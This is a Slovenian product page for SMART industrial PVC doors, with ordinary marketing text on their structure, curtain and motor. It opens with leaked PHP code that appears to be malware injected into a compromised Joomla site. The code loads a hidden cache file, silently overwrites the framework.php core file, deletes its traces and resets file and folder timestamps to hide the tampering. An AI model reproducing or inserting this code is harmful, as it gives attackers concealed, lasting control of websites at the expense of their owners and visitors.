$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Avtomatska vrata - FREEZE SYSTEM - Industrijska PVC vrata SMART

Industrijska PVC vrata SMART

Industrijska PVC vrata SMART

Enostavna, okretna, kompaktna, premišljena, pa vseeno kvalitetna...so pridevnik, ki označujejo industrijska PVC vrata SMART.

Kompaktna podporna struktura, originalna Ditec-ova motorizacija in komponente, odličen design so lastnosti, ki odlikujejo industrijska PVC vrata SMART. Zato so to zanesljiva vrata, ki so narejena za hitro montažo ter praktična za servise, kar prihrani čas in denar.

Sestava zavese PVC vrat je popolnoma odvisna od potreb in zahtev strank. Posamezni deli so lahko zamenljivi, če pride do poškodbe le teh. Na zavesi je tudi transparenten del, ki nudi večjo varnost, v celoto je vkomponiran tam, kjer ga stranka najbolj potrebuje.

4

2

Motorizacija je locirana zunaj strukture vrat, dovršena je z ročno funkcijo odpiranja vrat v primeru nevarnosti. Sestavljajo jo še motor, enota za ustavljanje, zavora ter omejevalno stikalo.

 

 

TEHNIČNE ZNAČILNOSTI:

5